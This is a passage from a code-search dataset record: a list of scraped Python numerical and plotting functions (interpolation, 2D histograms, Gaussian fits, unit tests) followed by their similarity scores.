colour reflecting objective value\n ax.scatter(\n obs_points[:, dim_x], obs_points[:, dim_y], color=scatter_colours[0], s=20, zorder=15\n )\n else:\n assert isinstance(obs_points, (list, tuple))\n # If multiple arrays given, colour the points according to the batch number\n for batch_num, batch_arr in enumerate(obs_points):\n ax.scatter(\n batch_arr[:, dim_x],\n batch_arr[:, dim_y],\n color=scatter_colours[batch_num],\n s=25,\n lw=0.0,\n alpha=0.8,\n zorder=15,\n )\n # Add axis labels\n if input_names is not None: # pragma: no cover\n # If plot in the first column (but not first row), add a y_label\n if i != 0 and j == 0:\n axes[i, j].set_ylabel(input_names[i])\n # If plot is at the bottom, add an x_label\n if i == n_dims - 1:\n axes[i, j].set_xlabel(input_names[j])\n if i >= j:\n # Remove redundant ticks on inner plots\n if i != n_dims - 1:\n axes[i, j].xaxis.set_visible(False)\n if j != 0:\n axes[i, j].yaxis.set_visible(False)\n # # Prune the upper-most tick from plot, so that the ticks don't overlap each other between plots\n # ax.yaxis.set_major_locator(ticker.MaxNLocator(prune='upper'))\n ax.tick_params(axis=\"both\", which=\"major\", labelsize=9)\n ax.tick_params(axis=\"both\", which=\"minor\", labelsize=6)\n # Update the colour limits of the slice plots\n for contour_set in contour_sets:\n contour_set.set_clim(vmin=func_values_min, vmax=func_values_max)\n # Add the colourbars\n if n_dims > 1:\n # make a colourbar for the contour plots\n cb1 = fig.colorbar(contour_sets[-1], cax=cbar_axes[0], aspect=50)\n cb1.set_label(output_label)\n cbar_axes[0].yaxis.set_ticks_position(\"left\")\n # make a colourbar for different batches\n if n_batches > 1: # pragma: no cover\n cb2 = matplotlib.colorbar.ColorbarBase( # type: ignore # auto\n cbar_axes[1],\n cmap=matplotlib.colors.ListedColormap(scatter_colours),\n boundaries=[x - 0.5 for x in range(n_batches + 1)],\n ticks=list(range(n_batches)),\n spacing=\"proportional\",\n )\n cb2.set_label(\"Batch Number\")\n else:\n cbar_axes[1].set_visible(False)\n return fig, axes",
"def f(x):\r\n\treturn np.sin(x)",
"def lin_gaus_2d(x, y, A, mu_x, sigma_x, mu_y, sigma_y, m, b):\n return A * np.exp(-((x-mu_x)**2/(2.*sigma_x**2)+(y-mu_y)**2/(2.*sigma_y**2))) + y*m + b",
"def sfunc(self,x,y):\n return np.exp(-(x-self.x_0)**2.0-(y-self.y_0)**2.0)",
"def evaluate_random_function(f, x, y):\n\n if f[0] == \"prod\":\n return evaluate_random_function(f[1],x,y) * evaluate_random_function(f[2],x,y)\n elif f[0] == \"sin_pi\":\n return sin(evaluate_random_function(f[1],x,y) * pi)\n elif f[0] == \"cos_pi\":\n return cos(evaluate_random_function(f[1],x,y) * pi)\n elif f[0] == \"x\":\n return x\n else:\n return y",
"def plot(self, a=None, b=None):\n\n # === choose reasonable interval if [a, b] not specified === #\n if a is None:\n a = self.observations.min() - self.observations.std()\n if b is None:\n b = self.observations.max() + self.observations.std()\n\n # === generate plot === #\n x_vals = np.linspace(a, b, num=100)\n f = np.vectorize(self.__call__)\n plt.plot(x_vals, f(x_vals))\n plt.show()",
"def generate_data(values, function=non_linear_fn, length=25, range_=[-1, 1]):\n\n # build x vector\n x = np.linspace(range_[0], range_[1], length)\n\n data = np.zeros((values.shape[0], length))\n\n for i in range(values.shape[0]):\n data[i, :] = function(x, values[i, 0], values[i, 1], values[i, 2])\n\n return data",
"def f(x):\n return x * np.sin(x)",
"def f(x):\n return x * np.sin(x)",
"def f(x):\n return x * np.sin(x)",
"def f(x):\n return x * np.sin(x)",
"def f(x, y):\n raise NotImplementedError",
"def lin_interpol(x_p, y_p):\r\n f = np.zeros([ x_p.shape[0] - 1 , 4 ]) # Coefficents and interval array\r\n \r\n for i in range( x_p.shape[0] - 1 ): # for every x[i], x[i+1] pair\r\n \r\n x_coeff = (y_p[i+1] - y_p[i]) / (x_p[i+1] - x_p[i])\r\n const = (x_p[i+1]*y_p[i] - x_p[i]*y_p[i+1] ) / (x_p[i+1] - x_p[i])\r\n \r\n # save the x coefficent, constant and the interval for this line\r\n f[i,:] = x_coeff, const, x_p[i], x_p[i+1]\r\n \r\n for a, b, start, end in f: # for every line fitted\r\n line_x = np.linspace( start, end, 3) # points to plot in x_range\r\n line_y = line_x * a + b # find the fitted line value at these points\r\n plt.plot(line_x,line_y,'k--', lw = 1, label = 'Linear' if a==f[0][0] else \"\") # only label one plot\r",
"def rectangular_integral(f, xrange, intervals):\n int_out = 0\n delta_x = (max(xrange)-min(xrange))/intervals\n new_xrange = np.linspace(min(xrange), max(xrange), intervals)\n for x in new_xrange:\n int_out += f(x)\n return delta_x*int_out",
"def plot_f(self, samples=0, plot_limits=None, which_data='all', which_functions='all', resolution=None, full_cov=False):\n if which_functions=='all':\n which_functions = [True]*self.kern.Nparts\n if which_data=='all':\n which_data = slice(None)\n\n if self.X.shape[1] == 1:\n Xnew, xmin, xmax = x_frame1D(self.X, plot_limits=plot_limits)\n if samples == 0:\n m,v = self._raw_predict(Xnew, slices=which_functions)\n gpplot(Xnew,m,m-2*np.sqrt(v),m+2*np.sqrt(v))\n pb.plot(self.X[which_data],self.likelihood.Y[which_data],'kx',mew=1.5)\n else:\n m,v = self._raw_predict(Xnew, slices=which_functions,full_cov=True)\n Ysim = np.random.multivariate_normal(m.flatten(),v,samples)\n gpplot(Xnew,m,m-2*np.sqrt(np.diag(v)[:,None]),m+2*np.sqrt(np.diag(v))[:,None])\n for i in range(samples):\n pb.plot(Xnew,Ysim[i,:],Tango.colorsHex['darkBlue'],linewidth=0.25)\n pb.plot(self.X[which_data],self.likelihood.Y[which_data],'kx',mew=1.5)\n pb.xlim(xmin,xmax)\n ymin,ymax = min(np.append(self.likelihood.Y,m-2*np.sqrt(np.diag(v)[:,None]))), max(np.append(self.likelihood.Y,m+2*np.sqrt(np.diag(v)[:,None])))\n ymin, ymax = ymin - 0.1*(ymax - ymin), ymax + 0.1*(ymax - ymin)\n pb.ylim(ymin,ymax)\n if hasattr(self,'Z'):\n pb.plot(self.Z,self.Z*0+pb.ylim()[0],'r|',mew=1.5,markersize=12)\n\n elif self.X.shape[1] == 2:\n resolution = resolution or 50\n Xnew, xmin, xmax, xx, yy = x_frame2D(self.X, plot_limits,resolution)\n m,v = self._raw_predict(Xnew, slices=which_functions)\n m = m.reshape(resolution,resolution).T\n pb.contour(xx,yy,m,vmin=m.min(),vmax=m.max(),cmap=pb.cm.jet)\n pb.scatter(Xorig[:,0],Xorig[:,1],40,Yorig,linewidth=0,cmap=pb.cm.jet,vmin=m.min(), vmax=m.max())\n pb.xlim(xmin[0],xmax[0])\n pb.ylim(xmin[1],xmax[1])\n else:\n raise NotImplementedError, \"Cannot define a frame with more than two input dimensions\"",
"def create_fig_2d(self, data_array_2d, output_fn='', xlabel='', ylabel='', title=''):",
"def test_float64(self):\r\n start, stop, step = dscalars('start', 'stop', 'step')\r\n out = arange(start, stop, step)\r\n f = function([start, stop, step], out)\r\n\r\n assert out.dtype == start.type.dtype\r\n arg_vals = [(0, 5, 1), (2, 11, 4), (-5, 1.1, 1.2), (1.3, 2,\r\n -2.1), (10, 2, 2)]\r\n for arg_v in arg_vals:\r\n start_v, stop_v, step_v = arg_v\r\n start_v_, stop_v_, step_v_ = numpy.asarray(arg_v,\r\n dtype=start.type.dtype)\r\n f_val = f(start_v_, stop_v_, step_v_)\r\n if config.cast_policy == 'custom':\r\n expected_val = numpy.arange(start_v, stop_v, step_v,\r\n dtype=start.type.dtype)\r\n elif config.cast_policy in ('numpy', 'numpy+floatX'):\r\n expected_val = numpy.arange(start_v_, stop_v_, step_v_)\r\n else:\r\n raise NotImplementedError(config.cast_policy)\r\n assert numpy.all(f_val == expected_val)",
"def _resample(x: np.ndarray, y: np.ndarray, n_samples: Optional[int]) -> Tuple[np.ndarray, np.ndarray]:\n if n_samples is None:\n n_samples = y.size\n new_x = np.linspace(x[0], x[1], n_samples)\n new_y = interp1d(x, y)(new_x)\n return new_x, new_y",
"def x_frame2D(X,plot_limits=None,resolution=None):\r\n assert X.shape[1] ==2, \"x_frame2D is defined for two-dimensional inputs\"\r\n if plot_limits is None:\r\n xmin,xmax = X.min(0),X.max(0)\r\n xmin, xmax = xmin-0.2*(xmax-xmin), xmax+0.2*(xmax-xmin)\r\n elif len(plot_limits)==2:\r\n xmin, xmax = plot_limits\r\n else:\r\n raise ValueError, \"Bad limits for plotting\"\r\n\r\n resolution = resolution or 50\r\n xx,yy = np.mgrid[xmin[0]:xmax[0]:1j*resolution,xmin[1]:xmax[1]:1j*resolution]\r\n Xnew = np.vstack((xx.flatten(),yy.flatten())).T\r\n return Xnew, xx, yy, xmin, xmax",
"def read_2d_analysis_data(f):\n \n data = np.transpose(np.loadtxt(f, dtype=np.float64))\n x = data[0]\n y = data[1]\n\n return x, y",
"def profileX(xdata, ydata, nbins, xrange=None, yrange=None, drop_nan=True):\n xmin, xmax = (np.min(xdata), np.max(xdata)) if xrange is None else xrange\n ymin, ymax = (np.min(ydata), np.max(ydata)) if yrange is None else yrange\n\n x_out = np.linspace(xmin, xmax, nbins+1)\n y_out = np.empty(nbins)\n y_err = np.empty(nbins)\n dx = np.diff(x_out)[0]\n\n selection = in_range(xdata, xmin, xmax) & in_range(ydata, ymin, ymax)\n xdata, ydata = xdata[selection], ydata[selection]\n for i in range(nbins):\n bin_data = np.extract(in_range(xdata, x_out[i], x_out[i+1]), ydata)\n y_out[i] = np.mean(bin_data)\n y_err[i] = np.std(bin_data) / bin_data.size**0.5\n x_out += dx / 2.\n x_out = x_out[:-1]\n if drop_nan:\n selection = ~(np.isnan(y_out) | np.isnan(y_err))\n x_out = x_out[selection]\n y_out = y_out[selection]\n y_err = y_err[selection]\n return x_out, y_out, y_err",
"def histogram2d(x, y, bins_x, bins_y):\n # x-range\n x_max, x_min = x.max(), x.min()\n delta_x = 1 / ((x_max - x_min) / bins_x)\n # y-range\n y_max, y_min = y.max(), y.min()\n delta_y = 1 / ((y_max - y_min) / bins_y)\n # compute histogram 2d\n xy_bin = np.zeros((np.int64(bins_x), np.int64(bins_y)), dtype=np.int64)\n for t in range(len(x)):\n i = (x[t] - x_min) * delta_x\n j = (y[t] - y_min) * delta_y\n if 0 <= i < bins_x and 0 <= j < bins_y:\n xy_bin[int(i), int(j)] += 1\n return xy_bin",
"def plot_dynamic_system(f, nb_sub=10, ax=None, xlim=[-1, 1], ylim=[-1, 1], scale=0.01,\n name=None, equal=False, **kwargs):\n\n Y, X = np.mgrid[ylim[0]:ylim[1]:complex(nb_sub), xlim[0]:xlim[\n 1]:complex(nb_sub)]\n mesh_data = np.vstack([X.ravel(), Y.ravel()])\n\n field = f(mesh_data.T).T\n\n U = field[0]\n V = field[1]\n U = U.reshape(nb_sub, nb_sub)\n V = V.reshape(nb_sub, nb_sub)\n speed = np.sqrt(U * U + V * V)\n\n if name is not None:\n plt.suptitle(name)\n\n if ax is not None:\n strm = ax.streamplot(X, Y, U, V, linewidth=scale * speed, **kwargs)\n ax.set_xlim(xlim)\n ax.set_ylim(ylim)\n\n if equal:\n ax.set_aspect('equal')\n\n else:\n strm = plt.streamplot(X, Y, U, V, linewidth=scale * speed, **kwargs)\n plt.xlim(xlim)\n plt.ylim(ylim)\n\n if equal:\n plt.axes().set_aspect('equal')\n\n return [strm]",
"def plot2dhist(xdata,ydata,cmap='binary',interpolation='nearest',\n fig=None,logscale=True,xbins=None,ybins=None,\n nbins=50,pts_only=False,**kwargs):\n\n setfig(fig)\n if pts_only:\n plt.plot(xdata,ydata,**kwargs)\n return\n\n ok = (~np.isnan(xdata) & ~np.isnan(ydata) & \n ~np.isinf(xdata) & ~np.isinf(ydata))\n if ~ok.sum() > 0:\n logging.warning('{} x values and {} y values are nan'.format(np.isnan(xdata).sum(),\n np.isnan(ydata).sum()))\n logging.warning('{} x values and {} y values are inf'.format(np.isinf(xdata).sum(),\n np.isinf(ydata).sum()))\n\n if xbins is not None and ybins is not None:\n H,xs,ys = np.histogram2d(xdata[ok],ydata[ok],bins=(xbins,ybins))\n else:\n H,xs,ys = np.histogram2d(xdata[ok],ydata[ok],bins=nbins) \n H = H.T\n\n if logscale:\n H = np.log(H)\n\n extent = [xs[0],xs[-1],ys[0],ys[-1]]\n plt.imshow(H,extent=extent,interpolation=interpolation,\n aspect='auto',cmap=cmap,origin='lower',**kwargs)",
"def lin_int(xs, ys):\n return scipy.interpolate.interp1d(xs, ys)",
"def drawLine2P(x,y,xlims):\n \n xrange = np.arange(xlims[0],xlims[1],1)\n A = np.vstack([x, np.ones(len(x))]).T\n k, b = np.linalg.lstsq(A, y, rcond=None)[0]\n return [xrange, k*xrange + b]",
"def axis2D(xlow,xhigh,xfirst,xstep,ylow,yhigh,yfirst,ystep):\n dislin.graf(xlow,xhigh,xfirst,xstep,\\\n ylow,yhigh,yfirst,ystep)",
"def f(x, alpha=0.80):\n n_particles = x.shape[0]\n #print('n_particles=' + str(n_particles))\n #print('x=' + str(x.shape))\n #print(x[0])\n j = [f_per_particle(x[i], alpha) for i in range(n_particles)]\n #print(j)\n return np.array(j)",
"def scale(x_range=1, y_range=1):\r\n x = rand_val(x_range)\r\n y = rand_val(y_range)\r\n return np.array(((x, 0, 0),\r\n (0, y, 0),\r\n (0, 0, 1)), dtype=np.float)",
"def gaussian2d(p, x, y):\n #2010-06-08 20:00 IJC: Created\n #2013-04-19 23:49 IJMC: Improved documentation, per BACM's request.\n \n x = array(x, dtype=float).copy()\n y = array(y, dtype=float).copy()\n p = array(p).copy()\n\n if len(p)==4:\n p = concatenate((p, [0]))\n\n z = p[4] + p[0]/(2*pi*p[1]**2) * exp(-((x-p[2])**2 + (y-p[3])**2) / (2*p[1]**2))\n \n return z",
"def parametric(\n self, *args, values=None,\n cmap=None, norm=None, interp=0,\n scalex=True, scaley=True,\n **kwargs\n ):\n # First error check\n # WARNING: So far this only works for 1D *x* and *y* coordinates.\n # Cannot draw multiple colormap lines at once\n if values is None:\n raise ValueError('Requires a \"values\" keyword arg.')\n if len(args) not in (1, 2):\n raise ValueError(f'Requires 1-2 arguments, got {len(args)}.')\n y = np.array(args[-1]).squeeze()\n x = np.arange(\n y.shape[-1]) if len(args) == 1 else np.array(args[0]).squeeze()\n values = np.array(values).squeeze()\n if x.ndim != 1 or y.ndim != 1 or values.ndim != 1:\n raise ValueError(\n f'x ({x.ndim}d), y ({y.ndim}d), and values ({values.ndim}d)'\n ' must be 1-dimensional.'\n )\n if len(x) != len(y) or len(x) != len(values) or len(y) != len(values):\n raise ValueError(\n f'{len(x)} xs, {len(y)} ys, but {len(values)} '\n ' colormap values.'\n )\n\n # Interpolate values to allow for smooth gradations between values\n # (bins=False) or color switchover halfway between points (bins=True)\n # Then optionally interpolate the corresponding colormap values\n if interp > 0:\n xorig, yorig, vorig = x, y, values\n x, y, values = [], [], []\n for j in range(xorig.shape[0] - 1):\n idx = (\n slice(None, -1) if j + 1 < xorig.shape[0] - 1\n else slice(None))\n x.extend(np.linspace(\n xorig[j], xorig[j + 1], interp + 2)[idx].flat)\n y.extend(np.linspace(\n yorig[j], yorig[j + 1], interp + 2)[idx].flat)\n values.extend(np.linspace(\n vorig[j], vorig[j + 1], interp + 2)[idx].flat)\n x, y, values = np.array(x), np.array(y), np.array(values)\n coords = []\n levels = edges(values)\n for j in range(y.shape[0]):\n # Get x/y coordinates and values for points to the 'left' and\n # 'right' of each joint\n if j == 0:\n xleft, yleft = [], []\n else:\n xleft = [(x[j - 1] + x[j]) / 2, x[j]]\n yleft = [(y[j - 1] + y[j]) / 2, y[j]]\n if j + 1 == y.shape[0]:\n xright, yright = [], []\n else:\n xleft = xleft[:-1] # prevent repetition when joined with right\n yleft = yleft[:-1]\n xright = [x[j], (x[j + 1] + x[j]) / 2]\n yright = [y[j], (y[j + 1] + y[j]) / 2]\n pleft = np.stack((xleft, yleft), axis=1)\n pright = np.stack((xright, yright), axis=1)\n coords.append(np.concatenate((pleft, pright), axis=0))\n\n # Create LineCollection and update with values\n hs = mcollections.LineCollection(\n np.array(coords), cmap=cmap, norm=norm,\n linestyles='-', capstyle='butt', joinstyle='miter'\n )\n hs.set_array(np.array(values))\n hs.update({\n key: value for key, value in kwargs.items()\n if key not in ('color',)\n })\n\n # Add collection with some custom attributes\n self.add_collection(hs)\n self.autoscale_view(scalex=scalex, scaley=scaley)\n hs.values = values\n hs.levels = levels # needed for other functions some\n return hs",
"def find_fmin_on_grid(f, xs, args, full_output):\n Nx = len(xs)\n Jout = np.zeros(Nx)\n for k in range(Nx):\n Jout[k] = f(xs[k], *args)\n idx = np.nanargmin(Jout)\n if not full_output:\n return xs[idx], Jout[idx]\n return xs[idx], Jout[idx], xs, Jout",
"def __init__(self, size=60, n=2, gamma=10, limit=15):\n self.n = n\n self.gamma = gamma\n self.limit = limit\n self.a = (1 / gamma) / (gamma - 1)\n\n x = np.arange(size)\n #endpoint=True breaks the plot of curve, \n #but allows work with [0, 1], not [0, 1) \n self.coord = []\n for i in x:\n for j in x:\n result = psi.inner_function((i / size, j / size), gamma, n)[0] \n self.coord.append((i, j, result))\n self.coord.sort(key=lambda x: x[2])\n self.x = np.array([i[0] for i in self.coord])\n self.y = np.array([i[1] for i in self.coord])",
"def map(self, f_list: List[Callable[[np.ndarray], int]], axis: int = 0, chunksize: int = 1000, selection: np.ndarray = None) -> List[np.ndarray]:\n\t\tif hasattr(f_list, '__call__'):\n\t\t\traise ValueError(\"f_list must be a list of functions, not a function itself\")\n\n\t\tresult = []\n\t\tif axis == 0:\n\t\t\trows_per_chunk = chunksize\n\t\t\tfor i in range(len(f_list)):\n\t\t\t\tresult.append(np.zeros(self.shape[0]))\n\t\t\tix = 0\n\t\t\twhile ix < self.shape[0]:\n\t\t\t\trows_per_chunk = min(self.shape[0] - ix, rows_per_chunk)\n\t\t\t\tif selection is not None:\n\t\t\t\t\tchunk = self[ix:ix + rows_per_chunk, :][:, selection]\n\t\t\t\telse:\n\t\t\t\t\tchunk = self[ix:ix + rows_per_chunk, :]\n\t\t\t\tfor i in range(len(f_list)):\n\t\t\t\t\tresult[i][ix:ix + rows_per_chunk] = np.apply_along_axis(f_list[i], 1, chunk)\n\t\t\t\tix = ix + rows_per_chunk\n\t\telif axis == 1:\n\t\t\tcols_per_chunk = chunksize\n\t\t\tfor i in range(len(f_list)):\n\t\t\t\tresult.append(np.zeros(self.shape[1]))\n\t\t\tix = 0\n\t\t\twhile ix < self.shape[1]:\n\t\t\t\tcols_per_chunk = min(self.shape[1] - ix, cols_per_chunk)\n\t\t\t\tif selection is not None:\n\t\t\t\t\tchunk = self[:, ix:ix + cols_per_chunk][selection, :]\n\t\t\t\telse:\n\t\t\t\t\tchunk = self[:, ix:ix + cols_per_chunk]\n\t\t\t\tfor i in range(len(f_list)):\n\t\t\t\t\tresult[i][ix:ix + cols_per_chunk] = np.apply_along_axis(f_list[i], 0, chunk)\n\t\t\t\tix = ix + cols_per_chunk\n\t\treturn result",
"def xy_mesh(nx, ny, x_min=0, x_max=1, y_min=0, y_max=1):\n\n\tx = np.linspace(x_min, x_max, nx)\n\ty = np.linspace(y_min, y_max, ny)\n\txv, yv = np.meshgrid(x, y)\n\t\n\treturn xv, yv",
"def plot(self, center=0, xmin=-1, xmax=1):\n if self.eps == 0:\n return [xmin, center, center, xmax], [0, 0, 1, 1]\n else:\n n = 200./self.eps\n x = concatenate(\n linspace(xmin, center-self.eps, 21),\n linspace(center-self.eps, center+self.eps, n+1),\n linspace(center+self.eps, xmax, 21))\n y = self(x)\n return x, y",
"def smoothSpectrum(f, X_f, r_oct):\n X_f_out = np.zeros(np.shape(X_f))\n for n in range(np.shape(f)[0]):\n # standard deviation\n sigma = f[n] / r_oct / np.pi\n # Gaussian window with the center frequnecy f[n] an dstandard deviation\n w = np.exp( -(f-f[n])**2 / (2*sigma**2) )\n w = w / np.sum(w, axis=0)\n X_f_out[n] = np.sum(w * X_f)\n \n return X_f_out",
"def testing_fixed_point_newton_interp(fixed_point_functions, n, m=400):\n\n # Function to convert to root finding problem given g(x). 'g(x*) = x*' -> 'f(x*) = 0'\n Ffun = lambda Gfun: lambda x: Gfun(x) -x\n\n import matplotlib.pylab as plt\n\n # setting up figure\n num_plots = len(fixed_point_functions)\n\n fig, axs = plt.subplots(1, num_plots, figsize=(15, 6), facecolor='w', edgecolor='k')\n fig.subplots_adjust(hspace = .5, wspace=.001)\n axs = axs.ravel()\n\n i = 0 # 'graph number'\n for Gfun_name, Gfun in fixed_point_functions.items():\n\n # <computation block>\n\n # convert to root finding problem\n f = Ffun(Gfun)\n\n # compute x and y data points\n x = np.linspace(-1,1,n)\n y = f(x)\n\n # compute coefficients of interpolating polynomial\n c = coeffients(x,y)\n\n # evaluate actual function points for graph\n ax = np.linspace(-1,1,m)\n ay = f(ax)\n\n # calculate y values using the interpolating polynomials coefficients\n y_hats = []\n for xi in ax:\n y_hati = np.polyval(c, xi)\n y_hats.append(y_hati)\n\n # <\\computation block>\n\n # create plot for this function\n axs[i].plot( ax, ay, 'k' ) # function in black\n axs[i].plot( ax, y_hats, 'r' ) # interpolating polynomial in red\n axs[i].set_title(Gfun_name)\n\n # increment graph number\n i += 1\n\n plt.show()",
"def projectionX(xdata, ydata, nbins, xrange=None, yrange=None):\n xmin, xmax = (np.min(xdata), np.max(xdata)) if xrange is None else xrange\n ymin, ymax = (np.min(ydata), np.max(ydata)) if yrange is None else yrange\n\n x_out = np.linspace(xmin, xmax, nbins+1)\n y_out = np.empty(nbins)\n dx = np.diff(x_out)[0]\n\n selection = in_range(xdata, xmin, xmax) & in_range(ydata, ymin, ymax)\n xdata, ydata = xdata[selection], ydata[selection]\n for i in range(nbins):\n bin_data = np.extract(in_range(xdata, x_out[i], x_out[i+1]), ydata)\n y_out[i] = bin_data.size\n x_out += dx / 2.\n x_out = x_out[:-1]\n return x_out, y_out",
"def test_f_two_sample(self):\r\n\r\n # The expected values in this test are obtained through R.\r\n # In R the F test is var.test(x,y) different alternative hypotheses\r\n # can be specified (two sided, less, or greater).\r\n # The vectors are random samples from a particular normal distribution\r\n #(mean and sd specified).\r\n\r\n # a: 50 elem, mean=0 sd=1\r\n a = [-0.70701689, -1.24788845, -1.65516470, 0.10443876, -0.48526915,\r\n -0.71820656, -1.02603596, 0.03975982, -2.23404324, -0.21509363,\r\n 0.08438468, -0.01970062, -0.67907971, -0.89853667, 1.11137131,\r\n 0.05960496, -1.51172084, -0.79733957, -1.60040659, 0.80530639,\r\n -0.81715836, -0.69233474, 0.95750665, 0.99576429, -1.61340216,\r\n -0.43572590, -1.50862327, 0.92847551, -0.68382338, -1.12523522,\r\n -0.09147488, 0.66756023, -0.87277588, -1.36539039, -0.11748707,\r\n -1.63632578, -0.31343078, -0.28176086, 0.33854483, -0.51785630,\r\n 2.25360559, -0.80761191, 1.18983499, 0.57080342, -1.44601700,\r\n -0.53906955, -0.01975266, -1.37147915, -0.31537616, 0.26877544]\r\n\r\n # b: 50 elem, mean=0, sd=1.2\r\n b = [\r\n 0.081418743, 0.276571612, -\r\n 1.864316504, 0.675213612, -0.769202643,\r\n 0.140372825, -1.426250184, 0.058617884, -\r\n 0.819287409, -0.007701916,\r\n -0.782722020, -\r\n 0.285891593, 0.661980419, 0.383225191, 0.622444946,\r\n -0.192446150, 0.297150571, 0.408896059, -\r\n 0.167359383, -0.552381362,\r\n 0.982168338, 1.439730446, 1.967616101, -\r\n 0.579607307, 1.095590943,\r\n 0.240591302, -1.566937143, -\r\n 0.199091349, -1.232983905, 0.362378169,\r\n 1.166061081, -0.604676222, -\r\n 0.536560206, -0.303117595, 1.519222792,\r\n -0.319146503, 2.206220810, -\r\n 0.566351124, -0.720397392, -0.452001377,\r\n 0.250890097, 0.320685395, -\r\n 1.014632725, -3.010346273, -1.703955054,\r\n 0.592587381, -1.237451255, 0.172243366, -0.452641122, -0.982148581]\r\n\r\n # c: 60 elem, mean=5, sd=1\r\n c = [4.654329, 5.242129, 6.272640, 5.781779, 4.391241, 3.800752,\r\n 4.559463, 4.318922, 3.243020, 5.121280, 4.126385, 5.541131,\r\n 4.777480, 5.646913, 6.972584, 3.817172, 6.128700, 4.731467,\r\n 6.762068, 5.082983, 5.298511, 5.491125, 4.532369, 4.265552,\r\n 5.697317, 5.509730, 2.935704, 4.507456, 3.786794, 5.548383,\r\n 3.674487, 5.536556, 5.297847, 2.439642, 4.759836, 5.114649,\r\n 5.986774, 4.517485, 4.579208, 4.579374, 2.502890, 5.190955,\r\n 5.983194, 6.766645, 4.905079, 4.214273, 3.950364, 6.262393,\r\n 8.122084, 6.330007, 4.767943, 5.194029, 3.503136, 6.039079,\r\n 4.485647, 6.116235, 6.302268, 3.596693, 5.743316, 6.860152]\r\n\r\n # d: 30 elem, mean=0, sd =0.05\r\n d = [\r\n 0.104517366, 0.023039678, 0.005579091, 0.052928250, 0.020724823,\r\n -0.060823243, -0.019000890, -\r\n 0.064133996, -0.016321594, -0.008898334,\r\n -0.027626992, -0.051946186, 0.085269587, -\r\n 0.031190678, 0.065172938,\r\n -0.054628573, 0.019257306, -\r\n 0.032427056, -0.058767356, 0.030927400,\r\n 0.052247357, -\r\n 0.042954937, 0.031842104, 0.094130522, -0.024828465,\r\n 0.011320453, -0.016195062, 0.015631245, -0.050335598, -0.031658335]\r\n\r\n a, b, c, d = map(array, [a, b, c, d])\r\n self.assertEqual(map(len, [a, b, c, d]), [50, 50, 60, 30])\r\n\r\n # allowed error. 
This big, because results from R\r\n # are rounded at 4 decimals\r\n error = 1e-4\r\n\r\n self.assertFloatEqual(f_two_sample(a, a), (49, 49, 1, 1), eps=error)\r\n self.assertFloatEqual(f_two_sample(a, b), (49, 49, 0.8575, 0.5925),\r\n eps=error)\r\n self.assertFloatEqual(f_two_sample(b, a), (49, 49, 1.1662, 0.5925),\r\n eps=error)\r\n self.assertFloatEqual(f_two_sample(a, b, tails='low'),\r\n (49, 49, 0.8575, 0.2963), eps=error)\r\n self.assertFloatEqual(f_two_sample(a, b, tails='high'),\r\n (49, 49, 0.8575, 0.7037), eps=error)\r\n self.assertFloatEqual(f_two_sample(a, c),\r\n (49, 59, 0.6587, 0.1345), eps=error)\r\n # p value very small, so first check df's and F value\r\n self.assertFloatEqualAbs(f_two_sample(d, a, tails='low')[0:3],\r\n (29, 49, 0.0028), eps=error)\r\n assert f_two_sample(d, a, tails='low')[3] < 2.2e-16 # p value\r",
"def monte_carlo_integration(f, n, a, b, ret_arrays=False):\n x = np.random.uniform(0, 1, n)*(b-a)+a\n f_array = f(x)\n\n positive_x = x[f_array >= 0]\n negative_x = x[f_array < 0]\n if positive_x.size > 0:\n h = np.max(f_array)\n else:\n h = np.max(-f_array)\n \n y_positive = np.random.uniform(0, 1, positive_x.size)*h\n y_negative = np.random.uniform(0, 1, negative_x.size)*h\n \n xy_indices_below = y_positive <= f(positive_x)\n xy_indices_above = y_negative <= -f(negative_x)\n n_inside_below = y_positive[xy_indices_below]\n n_inside_above = -y_negative[xy_indices_above]\n \n if ret_arrays:\n n_inside_x = np.append(positive_x[xy_indices_below],negative_x[xy_indices_above])\n n_inside_y = np.append(n_inside_below, n_inside_above)\n return n_inside_x, n_inside_y\n \n return h*(b-a)*(n_inside_below.size-n_inside_above.size)/(n)",
"def x_mesh(N,interval):\n (a,b) = interval\n h = (b-a)/N\n xmesh1=[a]\n for i in range(1,N):\n xmesh1.append(a+i*h)\n xmesh1.append(b)\n xmesh2=xmesh1[1:N]\n \n return xmesh1,xmesh2",
"def vis_g(f1,f2):\n data = generator(fixed_noise).data.numpy()\n if np.isnan(data).any():\n return\n \n plt.scatter(data[:,f1], data[:,f2], alpha=0.2, c='b')\n plt.xlim(lims)\n plt.ylim(lims)",
"def plot_2d(self, x1: Union[Iterable, ndarray], x2: Union[Iterable, ndarray],\n color_map: str = 'viridis', ax: Axes = None) -> Axes:\n x1_grid, x2_grid = meshgrid(x1, x2)\n x1_x2 = dstack((x1_grid, x2_grid))\n f = self._method(x1_x2)\n ax = ax or new_axes()\n ax.contourf(x1_grid, x2_grid, f, cmap=color_map)\n ax.set_xlabel('x1')\n ax.set_ylabel('x2')\n return ax",
"def evaluate_random_function(f, x, y):\n # this section actually evaluates the functions \n\n if f[0] == \"x\":\n return x \n elif f[0] == \"y\":\n return y\n elif f[0] == \"sin_pi\":\n return math.sin(math.pi*evaluate_random_function(f[1], x, y ))\n elif f[0] == \"cos_pi\":\n return math.cos(math.pi*evaluate_random_function(f[1], x, y ))\n elif f[0] == \"prod\":\n return evaluate_random_function(f[1] , x , y ) * evaluate_random_function(f[2] , x , y )\n elif f[0] == \"avg\":\n return (evaluate_random_function(f[1] , x , y ) + evaluate_random_function(f[2] , x , y)) / 2.0\n elif f[0] == \"squ\":\n return evaluate_random_function(f[1] , x , y ) * evaluate_random_function(f[1] , x , y ) \n elif f[0] == \"cir\":\n return ((evaluate_random_function(f[1] , x , y )**2 + evaluate_random_function(f[2] , x , y)) **2 )**0.5\n elif f[0] == \"sms\":\n return (evaluate_random_function(f[1] , x , y )**2 - evaluate_random_function(f[2] , x , y)) **2 \n\n #elif f == [\"sinpi\"]:\n # return math.sin(math.pi*)",
"def histogram2d(x,y, bins=10, range=None, normed=False, weights=None):\r\n from numpy import histogramdd\r\n\r\n try:\r\n N = len(bins)\r\n except TypeError:\r\n N = 1\r\n\r\n if N != 1 and N != 2:\r\n xedges = yedges = asarray(bins, float)\r\n bins = [xedges, yedges]\r\n hist, edges = histogramdd([x,y], bins, range, normed, weights)\r\n return hist, edges[0], edges[1]"
] | [
"0.6939351",
"0.6302334",
"0.6178659",
"0.58382726",
"0.57627946",
"0.5739403",
"0.56020606",
"0.5559102",
"0.5487004",
"0.5467543",
"0.5426483",
"0.5417944",
"0.53844726",
"0.53342545",
"0.53172773",
"0.53114015",
"0.5287415",
"0.5252938",
